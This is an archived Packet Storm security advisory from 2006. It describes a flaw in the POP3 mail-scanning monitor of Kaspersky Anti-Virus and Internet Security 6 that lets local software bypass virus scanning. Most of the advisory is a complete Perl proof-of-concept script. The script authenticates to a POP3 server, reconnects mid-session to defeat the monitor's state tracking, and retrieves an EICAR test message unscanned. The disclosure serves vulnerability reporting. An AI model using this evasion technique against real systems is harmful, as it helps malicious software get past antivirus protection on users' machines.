exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Kaspersky6-POP3.txt

Kaspersky6-POP3.txt
Posted May 29, 2006
Authored by bug.registrator

Kaspersky antivirus 6 suffers from an error in the POP3 state machine POP3 monitor thus allowing any malicious software on the local computer to bypass the POP3 monitor.

tags | exploit, local
SHA-256 | cfde53847ca7073a5d51de21e6afc60d7fa884300a01ec532fa94d49cbd67449

Kaspersky6-POP3.txt

Change Mirror Download
Kaspersky antivirus 6
Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to POP3 state machine error in POP3 monitor (Kaspersky Mail-antivirus).

Any mailicious software on local computer can bypass POP3 virus monitor.

Solution:

There is no known solution.

Exploit code:

Put eicar.com test file into your mailbox using subject 'eicar', correct this perl script (change POP3-server address, your acount name and the pasword) and run the script with ActiveState Perl 5.8:

#! /usr/bin/perl -w

use IO::Socket::INET;
use strict;

my( $h_srv, $h_port, $h_user, $h_pwd ) = ( YOUR.POP3.SERVER.IP/FQDN, 'pop(110)',
YOUR-ACCOUNT, YOUR-PASSWORD );
my( $g_str, $g_trc_out, $g_trc_in ) = ( '', 0, 0 );

my $server = pop3_connect();

sendthem( $server, "LIST" );
die "bad LIST command: $g_str" unless read_line( $server ) =~ /^\+OK/;

my @lst;
for( ;; ) {
my $str = read_line( $server );
last if $str =~ /^.$/;
push @lst, $1 if $str =~ /^(\d+)\s+/;
}
syswrite STDOUT, "msgs: ".(join ' ', @lst)."\n";

# !!! comment next line to have it working ;)
$server = pop3_connect( $server );

foreach( @lst ) {
my $uidl = $_;
sendthem( $server, "RETR $uidl" );
die "bad RETR command: $g_str" unless read_line( $server ) =~ /^\+OK/;
my $msg = '';
for( ;; ) {
my $str = read_line( $server );
last if $str =~ /^.$/;
$msg .= $str."\n";
}
syswrite STDOUT, "got: $uidl (".(length $msg)." bytes)\n";
syswrite STDOUT, $msg if $msg =~ /eicar/i;
}

sub pop3_connect {
my( $sock ) = @_;

syswrite STDOUT, "connecting to $h_srv:$h_port (as $h_user)\n";

$sock->close if $sock;
$sock = IO::Socket::INET->new( PeerAddr => $h_srv,
PeerPort => $h_port,
Proto => 'tcp' );
die "socket: $!" unless $sock;
die "wrong answer: $g_str" unless read_line( $sock ) =~ /^\+OK/;
sendthem( $sock, "USER $h_user" );
die "bad account: $g_str" unless read_line( $sock ) =~ /^\+OK/;
sendthem( $sock, "PASS $h_pwd" );
die "bad password: $g_str" unless read_line( $sock ) =~ /^\+OK/;
$sock;
}

sub sendthem {
my $sock = shift;
foreach( @_ ) {
my @a = split //, $_;
syswrite STDOUT, "cln: " if $g_trc_out;
foreach( @a ) {
sendone( $sock, $_ );
}
sendone( $sock, "\r" );
sendone( $sock, "\n" );
}
}

sub sendone {
my( $sock, $v ) = @_;
die "send: " if length $v != $sock->syswrite( $v );
syswrite STDOUT, $v if $g_trc_out;
}

sub read_line {
my( $sock ) = @_;
my $str = '';
for( ;; ) {
my $v = '';
my $r = $sock->sysread( $v, 1 );
die 'EOF reading headers!' unless $r;
last if $v eq "\n";
next if $v eq "\r";
$str .= $v;
}
syswrite STDOUT, "srv: $str\r\n" if $g_trc_out;
$g_str = $str;
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close